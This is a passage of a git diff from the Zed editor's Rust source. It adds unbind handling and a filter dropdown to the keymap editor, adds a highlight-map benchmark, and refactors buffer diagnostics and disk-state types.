@@ -742,13 +838,20 @@ impl KeymapEditor { let mut processed_bindings = Vec::new(); let mut string_match_candidates = Vec::new(); - for key_binding in key_bindings { + for (binding_index, &key_binding) in key_bindings.iter().enumerate() { + if gpui::is_unbind(key_binding.action()) { + continue; + } + let source = key_binding .meta() .map(KeybindSource::from_meta) .unwrap_or(KeybindSource::Unknown); let keystroke_text = ui::text_for_keybinding_keystrokes(key_binding.keystrokes(), cx); + 
let is_no_action = gpui::is_no_action(key_binding.action()); + let is_unbound_by_unbind = + binding_is_unbound_by_unbind(key_binding, binding_index, &key_bindings); let binding = KeyBinding::new(key_binding, source); let context = key_binding @@ -783,6 +886,8 @@ impl KeymapEditor { binding, context, source, + is_no_action, + is_unbound_by_unbind, action_information, )); string_match_candidates.push(string_match_candidate); @@ -976,20 +1081,23 @@ impl KeymapEditor { .and_then(KeybindContextString::local) .is_none(); - let selected_binding_is_unbound = selected_binding.is_unbound(); + let selected_binding_is_unmapped = selected_binding.is_unbound(); + let selected_binding_is_suppressed = selected_binding.is_unbound_by_unbind(); + let selected_binding_is_non_interactable = + selected_binding_is_unmapped || selected_binding_is_suppressed; let context_menu = ContextMenu::build(window, cx, |menu, _window, _cx| { menu.context(self.focus_handle.clone()) - .when(selected_binding_is_unbound, |this| { + .when(selected_binding_is_unmapped, |this| { this.action("Create", Box::new(CreateBinding)) }) .action_disabled_when( - selected_binding_is_unbound, + selected_binding_is_non_interactable, "Edit", Box::new(EditBinding), ) .action_disabled_when( - selected_binding_is_unbound, + selected_binding_is_non_interactable, "Delete", Box::new(DeleteBinding), ) @@ -1037,9 +1145,15 @@ impl KeymapEditor { &self, index: usize, conflict: Option, + is_unbound_by_unbind: bool, cx: &mut Context, ) -> IconButton { - if self.filter_state != FilterState::Conflicts + if is_unbound_by_unbind { + base_button_style(index, IconName::Warning) + .icon_color(Color::Warning) + .disabled(true) + .tooltip(Tooltip::text("This action is unbound")) + } else if self.filter_state != FilterState::Conflicts && let Some(conflict) = conflict { if conflict.is_user_keybind_conflict() { @@ -1199,6 +1313,9 @@ impl KeymapEditor { let Some((keybind, keybind_index)) = self.selected_keybind_and_index() else { return; }; + if 
!create && keybind.is_unbound_by_unbind() { + return; + } let keybind = keybind.clone(); let keymap_editor = cx.entity(); @@ -1305,6 +1422,9 @@ impl KeymapEditor { let Some(to_remove) = self.selected_binding().cloned() else { return; }; + if to_remove.is_unbound_by_unbind() { + return; + } let std::result::Result::Ok(fs) = self .workspace @@ -1367,6 +1487,31 @@ impl KeymapEditor { self.set_filter_state(self.filter_state.invert(), cx); } + fn toggle_no_action_bindings( + &mut self, + _: &ToggleNoActionBindings, + _: &mut Window, + cx: &mut Context, + ) { + self.show_no_action_bindings = !self.show_no_action_bindings; + self.on_query_changed(cx); + } + + fn toggle_user_bindings_filter(&mut self, cx: &mut Context) { + self.source_filters.user = !self.source_filters.user; + self.on_query_changed(cx); + } + + fn toggle_zed_defaults_filter(&mut self, cx: &mut Context) { + self.source_filters.zed_defaults = !self.source_filters.zed_defaults; + self.on_query_changed(cx); + } + + fn toggle_vim_defaults_filter(&mut self, cx: &mut Context) { + self.source_filters.vim_defaults = !self.source_filters.vim_defaults; + self.on_query_changed(cx); + } + fn set_filter_state(&mut self, filter_state: FilterState, cx: &mut Context) { if self.filter_state != filter_state { self.filter_state = filter_state; @@ -1442,6 +1587,127 @@ impl KeymapEditor { .filter(|kb| kb.keystrokes().is_some()) .any(|kb| kb.action().name == action_name) } + + fn render_filter_dropdown( + &self, + focus_handle: &FocusHandle, + cx: &mut Context, + ) -> impl IntoElement { + let focus_handle = focus_handle.clone(); + let keymap_editor = cx.entity(); + return PopoverMenu::new("keymap-editor-filter-menu") + .menu(move |window, cx| { + Some(ContextMenu::build_persistent(window, cx, { + let focus_handle = focus_handle.clone(); + let keymap_editor = keymap_editor.clone(); + move |mut menu, _window, cx| { + let (filter_state, source_filters, show_no_action_bindings) = keymap_editor + .read_with(cx, |editor, _| { + ( + 
editor.filter_state, + editor.source_filters, + editor.show_no_action_bindings, + ) + }); + + menu = menu + .context(focus_handle.clone()) + .header("Filters") + .map(add_filter( + "Conflicts", + matches!(filter_state, FilterState::Conflicts), + Some(ToggleConflictFilter.boxed_clone()), + &focus_handle, + &keymap_editor, + None, + )) + .map(add_filter( + "No Action", + show_no_action_bindings, + Some(ToggleNoActionBindings.boxed_clone()), + &focus_handle, + &keymap_editor, + None, + )) + .separator() + .header("Categories") + .map(add_filter( + "User", + source_filters.user, + None, + &focus_handle, + &keymap_editor, + Some(|editor, cx| { + editor.toggle_user_bindings_filter(cx); + }), + )) + .map(add_filter( + "Default", + source_filters.zed_defaults, + None, + &focus_handle, + &keymap_editor, + Some(|editor, cx| { + editor.toggle_zed_defaults_filter(cx); + }), + )) + .map(add_filter( + "Vim", + source_filters.vim_defaults, + None, + &focus_handle, + &keymap_editor, + Some(|editor, cx| { + editor.toggle_vim_defaults_filter(cx); + }), + )); + menu + } + })) + }) + .anchor(gpui::Corner::TopRight) + .offset(gpui::Point { + x: px(0.0), + y: px(2.0), + }) + .trigger_with_tooltip( + IconButton::new("KeymapEditorFilterMenuButton", IconName::Sliders) + .icon_size(IconSize::Small) + .when( + self.keybinding_conflict_state.any_user_binding_conflicts(), + |this| this.indicator(Indicator::dot().color(Color::Warning)), + ), + Tooltip::text("Filters"), + ); + + fn add_filter( + name: &'static str, + toggled: bool, + action: Option>, + focus_handle: &FocusHandle, + keymap_editor: &Entity, + cb: Option)>, + ) -> impl FnOnce(ContextMenu) -> ContextMenu { + let focus_handle = focus_handle.clone(); + let keymap_editor = keymap_editor.clone(); + return move |menu: ContextMenu| { + menu.toggleable_entry( + name, + toggled, + IconPosition::End, + action.as_ref().map(|a| a.boxed_clone()), + move |window, cx| { + window.focus(&focus_handle, cx); + if let Some(action) = &action { + 
window.dispatch_action(action.boxed_clone(), cx); + } else if let Some(cb) = cb { + keymap_editor.update(cx, cb); + } + }, + ) + }; + } + } } struct HumanizedActionNameCache { @@ -1488,6 +1754,8 @@ struct KeybindInformation { binding: KeyBinding, context: KeybindContextString, source: KeybindSource, + is_no_action: bool, + is_unbound_by_unbind: bool, } impl KeybindInformation { @@ -1538,6 +1806,8 @@ impl ProcessedBinding { binding: KeyBinding, context: KeybindContextString, source: KeybindSource, + is_no_action: bool, + is_unbound_by_unbind: bool, action_information: ActionInformation, ) -> Self { Self::Mapped( @@ -1546,6 +1816,8 @@ impl ProcessedBinding { binding, context, source, + is_no_action, + is_unbound_by_unbind, }, action_information, ) @@ -1584,6 +1856,16 @@ impl ProcessedBinding { self.keybind_information().map(|keybind| &keybind.binding) } + fn is_no_action(&self) -> bool { + self.keybind_information() + .is_some_and(|keybind| keybind.is_no_action) + } + + fn is_unbound_by_unbind(&self) -> bool { + self.keybind_information() + .is_some_and(|keybind| keybind.is_unbound_by_unbind) + } + fn keystroke_text(&self) -> Option<&SharedString> { self.keybind_information() .map(|binding| &binding.keystroke_text) @@ -1694,6 +1976,7 @@ impl Render for KeymapEditor { let row_count = self.matches.len(); let focus_handle = &self.focus_handle; let theme = cx.theme(); + let search_mode = self.search_mode; v_flex() .id("keymap-editor") @@ -1711,6 +1994,7 @@ impl Render for KeymapEditor { .on_action(cx.listener(Self::copy_action_to_clipboard)) .on_action(cx.listener(Self::copy_context_to_clipboard)) .on_action(cx.listener(Self::toggle_conflict_filter)) + .on_action(cx.listener(Self::toggle_no_action_bindings)) .on_action(cx.listener(Self::toggle_keystroke_search)) .on_action(cx.listener(Self::toggle_exact_keystroke_matching)) .on_action(cx.listener(Self::show_matching_keystrokes)) @@ -1727,6 +2011,7 @@ impl Render for KeymapEditor { .child( h_flex() .gap_2() + 
.items_center() .child( h_flex() .key_context({ @@ -1748,152 +2033,65 @@ impl Render for KeymapEditor { h_flex() .gap_1() .min_w_96() + .items_center() .child( IconButton::new( - "KeymapEditorToggleFiltersIcon", + "KeymapEditorKeystrokeSearchButton", IconName::Keyboard, ) .icon_size(IconSize::Small) + .toggle_state(matches!( + search_mode, + SearchMode::KeyStroke { .. } + )) .tooltip({ let focus_handle = focus_handle.clone(); - move |_window, cx| { Tooltip::for_action_in( - "Search by Keystroke", + "Search by Keystrokes", &ToggleKeystrokeSearch, - &focus_handle.clone(), + &focus_handle, cx, ) } }) - .toggle_state(matches!( - self.search_mode, - SearchMode::KeyStroke { .. } - )) - .on_click(|_, window, cx| { + .on_click(cx.listener(|_, _, window, cx| { window.dispatch_action( ToggleKeystrokeSearch.boxed_clone(), cx, ); - }), + })), ) .child( - IconButton::new("KeymapEditorConflictIcon", IconName::Warning) - .icon_size(IconSize::Small) - .when( - self.keybinding_conflict_state - .any_user_binding_conflicts(), - |this| { - this.indicator( - Indicator::dot().color(Color::Warning), - ) - }, + self.render_filter_dropdown(focus_handle, cx) + ) + .child( + Button::new("edit-in-json", "Edit in JSON") + .style(ButtonStyle::Subtle) + .key_binding( + ui::KeyBinding::for_action_in(&zed_actions::OpenKeymapFile, &focus_handle, cx) + .map(|kb| kb.size(rems_from_px(10.))), ) - .tooltip({ - let filter_state = self.filter_state; - let focus_handle = focus_handle.clone(); - - move |_window, cx| { - Tooltip::for_action_in( - match filter_state { - FilterState::All => "Show Conflicts", - FilterState::Conflicts => { - "Hide Conflicts" - } - }, - &ToggleConflictFilter, - &focus_handle.clone(), - cx, - ) - } - }) - .selected_icon_color(Color::Warning) - .toggle_state(matches!( - self.filter_state, - FilterState::Conflicts - )) .on_click(|_, window, cx| { window.dispatch_action( - ToggleConflictFilter.boxed_clone(), + zed_actions::OpenKeymapFile.boxed_clone(), cx, ); - }), + }) ) .child( - 
h_flex() - .w_full() - .px_1p5() - .gap_1() - .justify_end() - .child( - PopoverMenu::new("open-keymap-menu") - .menu(move |window, cx| { - Some(ContextMenu::build(window, cx, |menu, _, _| { - menu.header("View Default...") - .action( - "Zed Key Bindings", - zed_actions::OpenDefaultKeymap - .boxed_clone(), - ) - .action( - "Vim Bindings", - zed_actions::vim::OpenDefaultKeymap.boxed_clone(), - ) - })) - }) - .anchor(gpui::Corner::TopRight) - .offset(gpui::Point { - x: px(0.0), - y: px(2.0), - }) - .trigger_with_tooltip( - IconButton::new( - "OpenKeymapJsonButton", - IconName::Ellipsis, - ) - .icon_size(IconSize::Small), - { - let focus_handle = focus_handle.clone(); - move |_window, cx| { - Tooltip::for_action_in( - "View Default...", - &zed_actions::OpenKeymapFile, - &focus_handle, - cx, - ) - } - }, - ), - ) - .child( - Button::new("edit-in-json", "Edit in JSON") - .style(ButtonStyle::Subtle) - .key_binding( - ui::KeyBinding::for_action_in(&zed_actions::OpenKeymapFile, &focus_handle, cx) - .map(|kb| kb.size(rems_from_px(10.))), - ) - .on_click(|_, window, cx| { - window.dispatch_action( - zed_actions::OpenKeymapFile.boxed_clone(), - cx, - ); - }) - ) - .child( - Button::new("create", "Create Keybinding") - .style(ButtonStyle::Outlined) - .key_binding( - ui::KeyBinding::for_action_in(&OpenCreateKeybindingModal, &focus_handle, cx) - .map(|kb| kb.size(rems_from_px(10.))), - ) - .on_click(|_, window, cx| { - window.dispatch_action( - OpenCreateKeybindingModal.boxed_clone(), - cx, - ); - }) + Button::new("create", "Create Keybinding") + .style(ButtonStyle::Outlined) + .key_binding( + ui::KeyBinding::for_action_in(&OpenCreateKeybindingModal, &focus_handle, cx) + .map(|kb| kb.size(rems_from_px(10.))), ) - + .on_click(|_, window, cx| { + window.dispatch_action( + OpenCreateKeybindingModal.boxed_clone(), + cx, + ); + }) ) ), ) @@ -1917,26 +2115,9 @@ impl Render for KeymapEditor { let this = cx.entity(); move |window, cx| this.read(cx).render_no_matches_hint(window, cx) }) 
- .column_widths(vec![ - DefiniteLength::Absolute(AbsoluteLength::Pixels(px(36.))), - DefiniteLength::Fraction(0.25), - DefiniteLength::Fraction(0.20), - DefiniteLength::Fraction(0.14), - DefiniteLength::Fraction(0.45), - DefiniteLength::Fraction(0.08), - ]) - .resizable_columns( - vec![ - TableResizeBehavior::None, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, // this column doesn't matter - ], - &self.current_widths, - cx, - ) + .width_config(ColumnWidthConfig::redistributable( + self.current_widths.clone(), + )) .header(vec!["", "Action", "Arguments", "Keystrokes", "Context", "Source"]) .uniform_list( "keymap-editor-table", @@ -1949,11 +2130,18 @@ impl Render for KeymapEditor { let binding = &this.keybindings[candidate_id]; let action_name = binding.action().name; let conflict = this.get_conflict(index); + let is_unbound_by_unbind = binding.is_unbound_by_unbind(); let is_overridden = conflict.is_some_and(|conflict| { !conflict.is_user_keybind_conflict() }); + let is_dimmed = is_overridden || is_unbound_by_unbind; - let icon = this.create_row_button(index, conflict, cx); + let icon = this.create_row_button( + index, + conflict, + is_unbound_by_unbind, + cx, + ); let action = div() .id(("keymap action", index)) @@ -1974,7 +2162,7 @@ impl Render for KeymapEditor { .when( !context_menu_deployed && this.show_hover_menus - && !is_overridden, + && !is_dimmed, |this| { this.tooltip({ let action_name = binding.action().name; @@ -2000,7 +2188,7 @@ impl Render for KeymapEditor { .cloned() .unwrap_or_default() .into_any_element(), - |binding| ui::KeyBinding::from_keystrokes(binding.keystrokes.clone(), binding.source).into_any_element() + |binding| ui::KeyBinding::from_keystrokes(binding.keystrokes.clone(), binding.source == KeybindSource::Vim).into_any_element() ); let action_arguments = match binding.action().arguments.clone() @@ -2027,7 +2215,7 @@ 
impl Render for KeymapEditor { .when( is_local && !context_menu_deployed - && !is_overridden + && !is_dimmed && this.show_hover_menus, |this| { this.tooltip(Tooltip::element({ @@ -2062,6 +2250,10 @@ impl Render for KeymapEditor { .map_row(cx.processor( |this, (row_index, row): (usize, Stateful

), _window, cx| { let conflict = this.get_conflict(row_index); + let candidate_id = this.matches.get(row_index).map(|candidate| candidate.candidate_id); + let is_unbound_by_unbind = candidate_id + .and_then(|candidate_id| this.keybindings.get(candidate_id)) + .is_some_and(ProcessedBinding::is_unbound_by_unbind); let is_selected = this.selected_index == Some(row_index); let row_id = row_group_id(row_index); @@ -2070,38 +2262,43 @@ impl Render for KeymapEditor { .id(("keymap-row-wrapper", row_index)) .child( row.id(row_id.clone()) - .on_any_mouse_down(cx.listener( - move |this, - mouse_down_event: &gpui::MouseDownEvent, - window, - cx| { - if mouse_down_event.button == MouseButton::Right { - this.select_index( - row_index, None, window, cx, - ); - this.create_context_menu( - mouse_down_event.position, - window, - cx, - ); - } - }, - )) - .on_click(cx.listener( - move |this, event: &ClickEvent, window, cx| { - this.select_index(row_index, None, window, cx); - if event.click_count() == 2 { - this.open_edit_keybinding_modal( - false, window, cx, - ); - } - }, - )) + .when(!is_unbound_by_unbind, |row| { + row.on_any_mouse_down(cx.listener( + move |this, + mouse_down_event: &gpui::MouseDownEvent, + window, + cx| { + if mouse_down_event.button == MouseButton::Right { + this.select_index( + row_index, None, window, cx, + ); + this.create_context_menu( + mouse_down_event.position, + window, + cx, + ); + } + }, + )) + }) + .when(!is_unbound_by_unbind, |row| { + row.on_click(cx.listener( + move |this, event: &ClickEvent, window, cx| { + this.select_index(row_index, None, window, cx); + if event.click_count() == 2 { + this.open_edit_keybinding_modal( + false, window, cx, + ); + } + }, + )) + }) .group(row_id) .when( - conflict.is_some_and(|conflict| { - !conflict.is_user_keybind_conflict() - }), + is_unbound_by_unbind + || conflict.is_some_and(|conflict| { + !conflict.is_user_keybind_conflict() + }), |row| { const OVERRIDDEN_OPACITY: f32 = 0.5; row.opacity(OVERRIDDEN_OPACITY) 
@@ -2109,7 +2306,8 @@ impl Render for KeymapEditor { ) .when_some( conflict.filter(|conflict| { - !this.context_menu_deployed() && + !is_unbound_by_unbind + && !this.context_menu_deployed() && !conflict.is_user_keybind_conflict() }), |row, conflict| { @@ -2126,8 +2324,12 @@ impl Render for KeymapEditor { }.map(|source| format!("This keybinding is overridden by the '{}' binding from {}.", binding.action().humanized_name, source)) }).unwrap_or_else(|| "This binding is overridden.".to_string()); - row.tooltip(Tooltip::text(context))}, - ), + row.tooltip(Tooltip::text(context)) + }, + ) + .when(is_unbound_by_unbind, |row| { + row.tooltip(Tooltip::text("This action is unbound")) + }), ) .border_2() .when( @@ -2208,9 +2410,10 @@ impl RenderOnce for SyntaxHighlightedText { } let mut run_style = text_style.clone(); - if let Some(highlight_style) = highlight_id.style(syntax_theme) { + if let Some(highlight_style) = syntax_theme.get(highlight_id).cloned() { run_style = run_style.highlight(highlight_style); } + // add the highlighted range runs.push(run_style.to_run(highlight_range.len())); offset = highlight_range.end; @@ -2928,9 +3131,11 @@ impl Render for KeybindingEditorModal { .child( Button::new("show_matching", "View") .label_size(LabelSize::Small) - .icon(IconName::ArrowUpRight) - .icon_color(Color::Muted) - .icon_size(IconSize::Small) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(cx.listener( |this, _, window, cx| { this.show_matching_bindings( @@ -3230,7 +3435,7 @@ impl ActionArgumentsEditor { impl Render for ActionArgumentsEditor { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let settings = theme::ThemeSettings::get_global(cx); + let settings = theme_settings::ThemeSettings::get_global(cx); let colors = cx.theme().colors(); let border_color = if self.is_loading { @@ -3275,7 +3480,6 @@ struct KeyContextCompletionProvider { impl CompletionProvider for 
KeyContextCompletionProvider { fn completions( &self, - _excerpt_id: editor::ExcerptId, buffer: &Entity, buffer_position: language::Anchor, _trigger: editor::CompletionContext, @@ -3711,13 +3915,8 @@ impl SerializableItem for KeymapEditor { _window: &mut Window, cx: &mut App, ) -> gpui::Task> { - workspace::delete_unloaded_items( - alive_items, - workspace_id, - "keybinding_editors", - &KEYBINDING_EDITORS, - cx, - ) + let db = KeybindingEditorDb::global(cx); + workspace::delete_unloaded_items(alive_items, workspace_id, "keybinding_editors", &db, cx) } fn deserialize( @@ -3728,11 +3927,9 @@ impl SerializableItem for KeymapEditor { window: &mut Window, cx: &mut App, ) -> gpui::Task>> { + let db = KeybindingEditorDb::global(cx); window.spawn(cx, async move |cx| { - if KEYBINDING_EDITORS - .get_keybinding_editor(item_id, workspace_id)? - .is_some() - { + if db.get_keybinding_editor(item_id, workspace_id)?.is_some() { cx.update(|window, cx| cx.new(|cx| KeymapEditor::new(workspace, window, cx))) } else { Err(anyhow!("No keybinding editor to deserialize")) @@ -3749,11 +3946,10 @@ impl SerializableItem for KeymapEditor { cx: &mut ui::Context, ) -> Option>> { let workspace_id = workspace.database_id()?; - Some(cx.background_spawn(async move { - KEYBINDING_EDITORS - .save_keybinding_editor(item_id, workspace_id) - .await - })) + let db = KeybindingEditorDb::global(cx); + Some(cx.background_spawn( + async move { db.save_keybinding_editor(item_id, workspace_id).await }, + )) } fn should_serialize(&self, _event: &Self::Event) -> bool { @@ -3782,7 +3978,7 @@ mod persistence { )]; } - db::static_connection!(KEYBINDING_EDITORS, KeybindingEditorDb, [WorkspaceDb]); + db::static_connection!(KeybindingEditorDb, [WorkspaceDb]); impl KeybindingEditorDb { query! 
{ @@ -3955,4 +4151,25 @@ mod tests { assert!(cmp("!(!(!a))", "!a")); assert!(cmp("!(!(!(!a)))", "a")); } + + #[test] + fn binding_is_unbound_by_unbind_respects_precedence() { + let binding = gpui::KeyBinding::new("tab", zed_actions::OpenKeymap, None); + let unbind = + gpui::KeyBinding::new("tab", gpui::Unbind(binding.action().name().into()), None); + + let unbind_then_binding = vec![&unbind, &binding]; + assert!(!binding_is_unbound_by_unbind( + &binding, + 1, + &unbind_then_binding, + )); + + let binding_then_unbind = vec![&binding, &unbind]; + assert!(binding_is_unbound_by_unbind( + &binding, + 0, + &binding_then_unbind, + )); + } } diff --git a/crates/keymap_editor/src/ui_components/keystroke_input.rs b/crates/keymap_editor/src/ui_components/keystroke_input.rs index e1f20de587c274a164a96e3b8d7189a3710ff301..75cc2869c855283302e9e2ce57b9a511f8ba4d37 100644 --- a/crates/keymap_editor/src/ui_components/keystroke_input.rs +++ b/crates/keymap_editor/src/ui_components/keystroke_input.rs @@ -1115,7 +1115,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); let fs = FakeFs::new(cx.executor()); diff --git a/crates/language/Cargo.toml b/crates/language/Cargo.toml index 58db79afe59f0e6d27e23eceb9861ea493d853fd..1392ed63f64b7d3e3f6ebb9f629168f6096c5b61 100644 --- a/crates/language/Cargo.toml +++ b/crates/language/Cargo.toml @@ -40,6 +40,7 @@ globset.workspace = true gpui.workspace = true http_client.workspace = true imara-diff.workspace = true +language_core.workspace = true itertools.workspace = true log.workspace = true lsp.workspace = true @@ -48,7 +49,6 @@ postage.workspace = true rand = { workspace = true, optional = true } regex.workspace = true rpc.workspace = true -schemars.workspace = true semver.workspace = true serde.workspace = true serde_json.workspace = true @@ -62,6 +62,7 @@ sum_tree.workspace = 
true task.workspace = true text.workspace = true theme.workspace = true +toml.workspace = true tracing.workspace = true tree-sitter-md = { workspace = true, optional = true } tree-sitter-python = { workspace = true, optional = true } @@ -100,6 +101,12 @@ toml.workspace = true unindent.workspace = true util = { workspace = true, features = ["test-support"] } zlog.workspace = true +criterion.workspace = true +theme_settings.workspace = true + +[[bench]] +name = "highlight_map" +harness = false [package.metadata.cargo-machete] ignored = ["tracing"] diff --git a/crates/language/benches/highlight_map.rs b/crates/language/benches/highlight_map.rs new file mode 100644 index 0000000000000000000000000000000000000000..678bd08a8db40b588c6f2716a14b04048fb46d23 --- /dev/null +++ b/crates/language/benches/highlight_map.rs @@ -0,0 +1,144 @@ +use criterion::{BenchmarkId, Criterion, black_box, criterion_group, criterion_main}; +use gpui::rgba; +use language::build_highlight_map; +use theme::SyntaxTheme; + +fn syntax_theme(highlight_names: &[&str]) -> SyntaxTheme { + SyntaxTheme::new(highlight_names.iter().enumerate().map(|(i, name)| { + let r = ((i * 37) % 256) as u8; + let g = ((i * 53) % 256) as u8; + let b = ((i * 71) % 256) as u8; + let color = rgba(u32::from_be_bytes([r, g, b, 0xff])); + (name.to_string(), color.into()) + })) +} + +static SMALL_THEME_KEYS: &[&str] = &[ + "comment", "function", "keyword", "string", "type", "variable", +]; + +static LARGE_THEME_KEYS: &[&str] = &[ + "attribute", + "boolean", + "comment", + "comment.doc", + "constant", + "constant.builtin", + "constructor", + "embedded", + "emphasis", + "emphasis.strong", + "function", + "function.builtin", + "function.method", + "function.method.builtin", + "function.special.definition", + "keyword", + "keyword.control", + "keyword.control.conditional", + "keyword.control.import", + "keyword.control.repeat", + "keyword.control.return", + "keyword.modifier", + "keyword.operator", + "label", + "link_text", + 
"link_uri", + "number", + "operator", + "property", + "punctuation", + "punctuation.bracket", + "punctuation.delimiter", + "punctuation.list_marker", + "punctuation.special", + "string", + "string.escape", + "string.regex", + "string.special", + "string.special.symbol", + "tag", + "text.literal", + "title", + "type", + "type.builtin", + "type.super", + "variable", + "variable.builtin", + "variable.member", + "variable.parameter", + "variable.special", +]; + +static SMALL_CAPTURE_NAMES: &[&str] = &[ + "function", + "keyword", + "string.escape", + "type.builtin", + "variable.builtin", +]; + +static LARGE_CAPTURE_NAMES: &[&str] = &[ + "attribute", + "boolean", + "comment", + "comment.doc", + "constant", + "constant.builtin", + "constructor", + "function", + "function.builtin", + "function.method", + "keyword", + "keyword.control", + "keyword.control.conditional", + "keyword.control.import", + "keyword.modifier", + "keyword.operator", + "label", + "number", + "operator", + "property", + "punctuation.bracket", + "punctuation.delimiter", + "punctuation.special", + "string", + "string.escape", + "string.regex", + "string.special", + "tag", + "type", + "type.builtin", + "variable", + "variable.builtin", + "variable.member", + "variable.parameter", +]; + +fn bench_build_highlight_map(c: &mut Criterion) { + let mut group = c.benchmark_group("build_highlight_map"); + + for (capture_label, capture_names) in [ + ("small_captures", SMALL_CAPTURE_NAMES as &[&str]), + ("large_captures", LARGE_CAPTURE_NAMES as &[&str]), + ] { + for (theme_label, theme_keys) in [ + ("small_theme", SMALL_THEME_KEYS as &[&str]), + ("large_theme", LARGE_THEME_KEYS as &[&str]), + ] { + let theme = syntax_theme(theme_keys); + group.bench_with_input( + BenchmarkId::new(capture_label, theme_label), + &(capture_names, &theme), + |b, (capture_names, theme)| { + b.iter(|| build_highlight_map(black_box(capture_names), black_box(theme))); + }, + ); + } + } + + group.finish(); +} + +criterion_group!(benches, 
bench_build_highlight_map); +criterion_main!(benches); diff --git a/crates/language/src/buffer.rs b/crates/language/src/buffer.rs index 1449052983a49a539201360ec48dd37c04a4ccae..a467cd789555d39a32ad4e1d7b21da7b14df9c25 100644 --- a/crates/language/src/buffer.rs +++ b/crates/language/src/buffer.rs @@ -1,10 +1,10 @@ pub mod row_chunk; use crate::{ - DebuggerTextObject, LanguageScope, Outline, OutlineConfig, PLAIN_TEXT, RunnableCapture, - RunnableTag, TextObject, TreeSitterOptions, + DebuggerTextObject, LanguageScope, ModelineSettings, Outline, OutlineConfig, PLAIN_TEXT, + RunnableCapture, RunnableTag, TextObject, TreeSitterOptions, diagnostic_set::{DiagnosticEntry, DiagnosticEntryRef, DiagnosticGroup}, - language_settings::{LanguageSettings, language_settings}, + language_settings::{AutoIndentMode, LanguageSettings}, outline::OutlineItem, row_chunk::RowChunks, syntax_map::{ @@ -16,11 +16,10 @@ use crate::{ unified_diff_with_offsets, }; pub use crate::{ - Grammar, Language, LanguageRegistry, - diagnostic_set::DiagnosticSet, - highlight_map::{HighlightId, HighlightMap}, + Grammar, HighlightId, HighlightMap, Language, LanguageRegistry, diagnostic_set::DiagnosticSet, proto, }; + use anyhow::{Context as _, Result}; use clock::Lamport; pub use clock::ReplicaId; @@ -33,10 +32,8 @@ use gpui::{ Task, TextStyle, }; -use lsp::{LanguageServerId, NumberOrString}; +use lsp::LanguageServerId; use parking_lot::Mutex; -use serde::{Deserialize, Serialize}; -use serde_json::Value; use settings::WorktreeId; use smallvec::SmallVec; use smol::future::yield_now; @@ -135,6 +132,7 @@ pub struct Buffer { /// The contents of a cell are (self.version, has_changes) at the time of a last call. has_unsaved_edits: Cell<(clock::Global, bool)>, change_bits: Vec>>, + modeline: Option>, _subscriptions: Vec, tree_sitter_data: Arc, encoding: &'static Encoding, @@ -187,7 +185,7 @@ struct BufferBranchState { /// state of a buffer. 
pub struct BufferSnapshot { pub text: text::BufferSnapshot, - pub syntax: SyntaxSnapshot, + pub(crate) syntax: SyntaxSnapshot, tree_sitter_data: Arc, diagnostics: TreeMap, remote_selections: TreeMap, @@ -195,6 +193,7 @@ pub struct BufferSnapshot { file: Option>, non_text_state_update_count: usize, pub capability: Capability, + modeline: Option>, } /// The kind and amount of indentation in a particular line. For now, @@ -250,57 +249,6 @@ struct SelectionSet { lamport_timestamp: clock::Lamport, } -/// A diagnostic associated with a certain range of a buffer. -#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)] -pub struct Diagnostic { - /// The name of the service that produced this diagnostic. - pub source: Option, - /// The ID provided by the dynamic registration that produced this diagnostic. - pub registration_id: Option, - /// A machine-readable code that identifies this diagnostic. - pub code: Option, - pub code_description: Option, - /// Whether this diagnostic is a hint, warning, or error. - pub severity: DiagnosticSeverity, - /// The human-readable message associated with this diagnostic. - pub message: String, - /// The human-readable message (in markdown format) - pub markdown: Option, - /// An id that identifies the group to which this diagnostic belongs. - /// - /// When a language server produces a diagnostic with - /// one or more associated diagnostics, those diagnostics are all - /// assigned a single group ID. - pub group_id: usize, - /// Whether this diagnostic is the primary diagnostic for its group. - /// - /// In a given group, the primary diagnostic is the top-level diagnostic - /// returned by the language server. The non-primary diagnostics are the - /// associated diagnostics. - pub is_primary: bool, - /// Whether this diagnostic is considered to originate from an analysis of - /// files on disk, as opposed to any unsaved buffer contents. 
This is a - /// property of a given diagnostic source, and is configured for a given - /// language server via the [`LspAdapter::disk_based_diagnostic_sources`](crate::LspAdapter::disk_based_diagnostic_sources) method - /// for the language server. - pub is_disk_based: bool, - /// Whether this diagnostic marks unnecessary code. - pub is_unnecessary: bool, - /// Quick separation of diagnostics groups based by their source. - pub source_kind: DiagnosticSourceKind, - /// Data from language server that produced this diagnostic. Passed back to the LS when we request code actions for this diagnostic. - pub data: Option, - /// Whether to underline the corresponding text range in the editor. - pub underline: bool, -} - -#[derive(Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize)] -pub enum DiagnosticSourceKind { - Pulled, - Pushed, - Other, -} - /// An operation used to synchronize this buffer with its other replicas. #[derive(Clone, Debug, PartialEq)] pub enum Operation { @@ -359,7 +307,7 @@ pub enum BufferEvent { is_local: bool, }, /// The buffer was edited. - Edited, + Edited { is_local: bool }, /// The buffer's `dirty` bit changed. DirtyChanged, /// The buffer was saved. @@ -435,7 +383,7 @@ pub enum DiskState { /// File created in Zed that has not been saved. New, /// File present on the filesystem. - Present { mtime: MTime }, + Present { mtime: MTime, size: u64 }, /// Deleted file that was previously present. Deleted, /// An old version of a file that was previously present @@ -448,7 +396,17 @@ impl DiskState { pub fn mtime(self) -> Option { match self { DiskState::New => None, - DiskState::Present { mtime } => Some(mtime), + DiskState::Present { mtime, .. } => Some(mtime), + DiskState::Deleted => None, + DiskState::Historic { .. } => None, + } + } + + /// Returns the file's size on disk in bytes. + pub fn size(self) -> Option { + match self { + DiskState::New => None, + DiskState::Present { size, .. 
